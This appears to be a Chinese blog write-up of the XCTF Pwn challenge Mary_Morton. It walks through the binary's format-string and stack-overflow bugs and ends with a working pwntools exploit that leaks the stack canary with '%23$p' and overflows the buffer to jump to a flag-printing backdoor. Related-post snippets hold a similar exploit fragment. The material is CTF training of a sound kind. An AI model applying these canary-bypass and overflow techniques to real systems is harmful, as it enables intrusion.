攻防世界 Pwn Mary_Morton

最新推荐文章于 2022-12-19 22:12:33 发布
原创 最新推荐文章于 2022-12-19 22:12:33 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

攻防世界 Pwn Mary_Morton

1.题目下载地址

点击下载题目

2.checksec看一下保护

在这里插入图片描述
开启了canary,没开PIE
大概率有后门函数,应该不是很难的题

3.IDA分析

3.1.main函数

 puts("Welcome to the battle ! ");
 puts("[Great Fairy] level pwned ");
 puts("Select your weapon ");
 while ( 1 )
 {
   while ( 1 )
   {
     sub_4009DA();
     __isoc99_scanf("%d", &v3);
     if ( v3 != 2 )
       break;
     sub_4008EB();
   }
   if ( v3 == 3 )
   {
     puts("Bye ");
     exit(0);
   }
   if ( v3 == 1 )
     sub_400960();
   else
     puts("Wrong!");
 }
}
  • 大概就是一个菜单,选择对应的号码就会进入对应的程序
  • 一个一个进去看

3.2. sub_400960()

unsigned __int64 sub_400960()
{
  char buf[136]; // [rsp+0h] [rbp-90h] BYREF
  unsigned __int64 v2; // [rsp+88h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  memset(buf, 0, 0x80uLL);
  read(0, buf, 0x100uLL);
  printf("-> %s\n", buf);
  return __readfsqword(0x28u) ^ v2;
}
  • 这个函数的printf()指定了输出目标,不适合格式化字符串漏洞

3.3. sub_4008EB()

unsigned __int64 sub_4008EB()
{
 char buf[136]; // [rsp+0h] [rbp-90h] BYREF
 unsigned __int64 v2; // [rsp+88h] [rbp-8h]

 v2 = __readfsqword(0x28u);
 memset(buf, 0, 0x80uLL);
 read(0, buf, 0x7FuLL);
 printf(buf);
 return __readfsqword(0x28u) ^ v2;
}
  • 这个函数的printf()函数可以格式化字符串
  • 因为这个程序开了canary,并且没开PIE
  • 很明显是一道格式化字符串加canary绕过
  • 找一下后门函数

3.4.

int sub_4008DA()
{
  return system("/bin/cat ./flag");
}

在这里插入图片描述

4.gdb动态调试

4.1.计算溢出量

计算偏移的方法,很好用
在这里插入图片描述

  • 可以数到,我们输入后的偏移为6

  • 又因为,buf和v2本来的差距就有0x90-8h=0x88 0x88/0x8=0x11(十进制17)
    在这里插入图片描述

  • 根据注释:buf在rbp-90h,v2在rbp-8h,所以,覆盖返回地址的话,需要0x90-0x8=0x88覆盖局部变量,然后放上canary的值,在8个“a”覆盖ebp,最后加上system的返回地址就可以。

  • 计算器算一下
    在这里插入图片描述
    那么往后找23个位置就是canary了

5.exp

python2写法

from pwn import *
 
# context.log_level = 'debug'
p = remote('111.198.29.45',56161)
 
p.recvuntil("Exit the battle ")
p.sendline(str(2))#先进入格式化函数泄漏cannary
p.sendline("%23$p")#泄漏cannary
p.recvuntil("0x")
canary = int(p.recv(16),16)#接收16个字节
 
p.recvuntil("Exit the battle ")
payload = "a"*0x88 + p64(canary) + 0x8*"a" + p64(0x04008DA)
p.sendline(str(1))
p.sendline(payload)
p.interactive()
攻防世界 Mary_Morton
10-07 380
1.题目 2.IDA分析 3.流程分析
攻防世界——进阶PWNMary_Morton
baidu_36110484的博客
06-14 491
0x01源码分析 今天做了一道PWN题,考察了格式化字符串漏洞和绕过canary的栈溢出。比较基础,但是还是有值得记录的地方。 checksec查看,64位程序,开启了canary和栈不可执行。拖进IDA里,看到源码逻辑还是比较简单的。存在一个格式化字符串漏洞还有一个栈溢出。还有一个后门函数0x4008DA。 0x02 格式化字符串漏洞 先用老脚本看一下格式化串的相对偏移。 #search_offset.py #encoding:utf-8 from pwn import * context.log_le
攻防世界)(pwnmary_mroton
PLpa的博客
07-20 940
经过一段时间的研究,终于接触到Canary了,不容易啊 拿到本题查看保护 开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑: 根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。 我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填...
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2356
攻防世界pwnMary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 284
做题记录
攻防世界pwn-Mary_Morton
qq_41168609的博客
01-04 374
题目 1、文件分析 64位的程序,并且开启了NX和Canary,还有Partial RELRO,got表有写权限 执行文件看流程 使用IDA进行分析,发现存在两处漏洞,字符串漏洞和栈溢出漏洞 通过搜索,存在后门函数 2、解题思路: 首先利用字符串漏洞,获取canary的值,绕过Canary保护 利用栈溢出漏洞,执行后门函数,获取到flag 3、获取canary值 计算偏移地址 canary的值就是var_8,我们需要获取var_8的值,栈溢出时保证该值不改变就可以绕过canary保护。 (1
4.pwn入门新手做攻防世界Mary_Morton (stack canary与绕过的思路)
qiudalaojiao的博客
02-14 702
canary 通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip 等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实 现。。这个概念应用在栈保护上则是在初始化一个栈帧时在栈底设置一个随机的canary值,栈帧销毁前 测试比较该值是否“死掉”,即是否被改变,若被改变则说明栈溢出发生,程序走另一个流程结束,以免漏洞利...
攻防世界-Mary_Morton
Henlenl的博客
11-30 3135
检查文件信息 amd64-elf文件 开启了Canary保护 开启了NX保护 ida静态分析 进入到sub_4008EB函数 格式化字符串漏洞 另外进入到sub_400960()函数有栈溢出漏洞 但是有一点开启了Canary 那么我们可以通过 格式化字符串任意读 泄露Canary地址 然后利用这个地址来进行溢出漏洞的利用 栈分布如图 而我们知道 v2就是用来储存canary的值的变量 而buf 大小位0x90 v2的大小位 0x8 覆盖return addr,需要0x90-0x8=0x88大小去
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1847
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
2019.10.10攻防世界 Mary_Morton
DSR446的博客
10-10 402
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90。且这是一个64位程序。我们可以计算canary的偏移 = 6(6个寄存器)+(0x90-0x8)/8 = 23 :这里子所以减0x8是减的rbp。 【注】:这个程序缺少符号表且没有开PIE,所以我们在下断点的到时候通过在ida中找相应的地址,不用加上程序的加载地址。 最后的 ...
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 1002
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
XCTF攻防世界高手mary_morton
weixin_45948183的博客
03-24 401
格式化字符串泄露canary,栈溢出 从函数执行就可以看出,一个格式化字符串啊漏洞,一个栈溢出漏洞 checksec了一下有canary的保护,开启了canary,就不能直接利用栈溢出覆盖返回地址,通过通过格式化字符串漏洞泄露canary的值,然后再进行栈溢出的覆盖 buf在rbp-90h,v2在rbp-8h,canary与我们输入参数的偏移为0x90 - 8 = 0x88所以,覆盖返回地址的话...
攻防世界高手进阶区 ——Mary_Morton
weixin_62675330的博客
02-26 4207
攻防世界高手进阶区 ——Mary_Morton 不容易呀,这都已经是第七题了,继续加油! 一,老规矩,先分析一下文件 checksec一下 发现开启了栈溢出,可能这个题就是学习栈溢出漏洞绕过的。 运行一下 告诉了存在栈溢出漏洞和格式化字符串漏洞。 file文件 ┌──(root💀kali)-[/home/…/面/ctf_workstation/Offensive_and_defensive_world/Mary_Morton] └─# file Mary_Morton
[攻防世界 pwn]——Mary_Morton
Y_peak的博客
02-20 317
[攻防世界 pwn]——Mary_Morton 题目地址: https://adworld.xctf.org.cn/ 题目: checksec看下,64位还开启了NX和canary保护。(一般开启canary保护,都有格式化字符串漏洞) 在IDA中看看, 果然有格式化字符串漏洞 仔细看看代码会发现, 这个是个死循环, 1 里面有栈溢出, 2里面有格式化字符串漏洞, 3是退出。 我们可以先利用格式化字符串的漏洞, 泄露出canary, 然后就可以利用栈溢出修改返回地址了。 最近我学了一个新的
mary_morton
pppp974的博客
07-22 1176
mary_morton 这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。 来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输...
攻防世界Mary_Morton wp
苗_的博客
10-13 399
首先查看他的保护机制:(checksec) 有canary保护 然后我们拖进ida发现两处溢出点: 看一下流程图和汇编可以知道readsqword这个地方有canary保护,只有 rax 和fs:28h 两个值相等的时候 才能跳转到返回值,反之则调用stack_chk_fail 找到后门函数 思路:将两个漏洞结合利用,首先利用字符串漏洞,泄露出canary的值,然后在函数要返回的时候再填回去,之后利用栈溢出,让其返回到后门函数 根据程序可以看出,v2应该就是canary的..
ASIS-CTF-Finals-2017 Mary_Morton
qq_41071646的博客
01-11 1407
讲道理 这个 其实 感觉有两个方法  两种方法 都要调用一下    第一个  printf函数      第一个是 我们第一个可以    用printf  然后hook掉got的printf  不知道好不好实现  自己搜索了 资料 也没有发现  第二个 就是观察栈了  。。。。。。。 这里有个保护   就是  readfsqword  在 ida 的f5看的不是很清楚 我们 看 汇编窗...
Mary_Morton
weixin_46711318的博客
08-19 259
之前有讲到canary的原理,这道题就用到了。 checksec ida 可以看到scanf是我们可以利用的格式化字符串漏洞,因此我们可以确认偏移了6个字节 而v2其实就是canary,通过观察buf所在的栈,发现偏移了0x88,那么就可以开始写代码了。 代码 from pwn import* s=remote('220.249.52.133',48752) sys=0x4008de s.recvuntil('battle') s.sendline('2') s.sendline('%23$p')
攻防世界pwn题目int_overflow
最新发布
03-08
### 关于CTF PWN Int Overflow Challenge Solution 在处理PWN类型的整数溢出挑战时,理解程序如何处理输入以及这些输入怎样影响内存至关重要。当遇到名为`int_overflow`的题目时,这可能意味着某个`int`型变量存在栈溢出风险[^2]。 对于这类问题的一个常见解决方法涉及以下几个方面: #### 分析目标程序 使用反汇编工具IDA可以深入分析二进制文件的工作原理。通过将题目中的可执行文件加载至IDA中并检查其主要逻辑流程,能够识别潜在的安全缺陷位置。特别是要注意那些未启用安全防护机制(如stack canary)的情况,在Ubuntu环境下测试可以帮助确认这一点。 #### 构造有效载荷(Payload) 基于发现的漏洞特性来构建特定的有效载荷是非常重要的一步。例如,在某些情况下,可以通过向缓冲区填充足够的数据直到覆盖返回地址,并指向一个已知地址处的gadget链或直接调用系统函数实现控制流劫持的目的。Python库`pwntools`提供了便捷的方法用于创建这样的payloads,并且支持本地调试和远程连接服务器提交攻击尝试[^3]。 ```python from pwn import * # 设置目标IP和端口 target_ip = "example.com" port_num = 12345 # 创建远程连接对象 io = remote(target_ip, port_num) # 定义payload结构 offset_to_ret_addr = ... # 需要根据实际情况调整偏移量大小 rop_chain_or_function_ptr = ... payload = b'A' * offset_to_ret_addr + pack(rop_chain_or_function_ptr) # 发送payload给服务端 io.sendlineafter(b"prompt:", payload) ``` 请注意上述代码片段仅为模板示意;实际操作前需依据具体情况进行适当修改以适应不同场景下的需求。 #### 测试与验证 完成以上准备工作之后,应当在一个受控环境中反复试验所设计出来的exploit直至成功获取shell或其他预期效果为止。同时也要注意遵守比赛规则和服务条款,确保行为合法合规[^4]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值